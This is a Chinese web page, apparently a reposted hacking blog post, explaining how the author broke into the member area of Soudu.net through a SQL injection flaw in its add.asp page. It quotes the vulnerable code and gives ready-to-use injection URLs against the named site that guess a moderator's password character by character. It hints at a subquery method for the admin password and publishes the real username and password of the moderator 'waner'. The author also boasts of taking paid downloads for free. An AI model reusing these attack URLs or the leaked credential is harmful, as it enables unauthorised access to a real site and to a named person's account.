当前位置:首页 > 软件开发 > net
firefox

破解搜毒网会员管理程序

http://xiaomutou.51.net/bbs/index.asp http://smallhome.51.net/lcx/wdb/index.asp 前两天,lcx给了我搜毒网的会员管理源程序,叫我看一下,据说小凤居用的也是这个,我估计小凤居会员密码外泄,也与此漏洞有关吧。 这个漏洞很低级。 经我的测试,搜毒网的管理员密码是经过md5加密的,而会员的密码是没有加密的,这对会员也太不负责了:) 得到会员密码后就可以直接进入会员专区,下载东西了,不用交钱,我比较喜欢研究病毒源码,这下我是下了个爽。 这个漏洞主要是sql注,有问题的代码在add.asp,这个文件是任意用户都可以访问的,有问题的代码如下 set rs1=server.createobject("adodb.recordset") rs1.open "select * from user where 用户名="&username&"",conn if not rs1.eof then response.write"" response.end end if 这理的username没有过滤何东西,其它admin_*的文件的安全性还不错,这理我们先要找一个已经是会员的用户名,这是成功的第一步,我是随便进了他们的论坛,找了个版主试了一下,waner就是个版主,我就用他了。 我们可以提交 http://www.soudu.net//huiyuan//add.asp?username=waner%20and%20len(密码)=6%20and%201 如返回“对不起,该用户名已经注册!请重新选择!”你就对了长度 再提交http://www.soudu.net//huiyuan//add.asp?username=waner%20and%20left(密码,1)=7%20and1 如返回“对不起,该用户名已经注册!请重新选择!”你就对了第1位密码 http://www.soudu.net//huiyuan//add.asp?username=waner%20and%20left(密码,2)=5%20and1 如返回“对不起,该用户名已经注册!请重新选择!”你就对了第2位密码 .......... 你可以用mid,和asc 函数配合使用不断的缩小范围,很快的. 至于如何获得管理员密码就要用跨表子查询了,我就不多说了,网上这种文章很多,见意你学一下标准sql语言。 这里送一个帐号 就用版主waner的帐号吧,密码:750902. 我已经通知搜毒网的管理员,下手要快,至于他什么时候补我就不知道了。有不对之处可与我联系 630king@maill.china.com

 ↓相关文章:
© 2006-2008 All Rights Reserved